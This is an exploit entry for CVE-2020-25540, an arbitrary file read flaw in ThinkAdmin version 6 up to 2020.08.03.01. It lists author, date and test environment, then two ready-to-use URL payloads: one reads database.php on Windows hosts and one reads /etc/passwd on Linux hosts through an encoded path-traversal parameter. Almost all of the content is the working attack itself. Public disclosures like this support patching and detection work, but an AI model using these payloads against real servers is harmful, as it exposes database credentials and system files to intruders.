16 lines
No EOL
719 B
Text
16 lines
No EOL
719 B
Text
# Exploit Title: ThinkAdmin 6 - Arbitrarily File Read
|
|
# Google Dork: N/A
|
|
# Date: 2020-09-14
|
|
# Exploit Author: Hzllaga
|
|
# Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/
|
|
# Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a
|
|
# Version: v6 <= 2020.08.03.01
|
|
# Tested on: PHP7.4.7,Apache
|
|
# CVE : CVE-2020-25540
|
|
|
|
PoC:
|
|
On Windows read database.php payload:
|
|
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34
|
|
|
|
On Linux read /etc/passwd payload:
|
|
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s |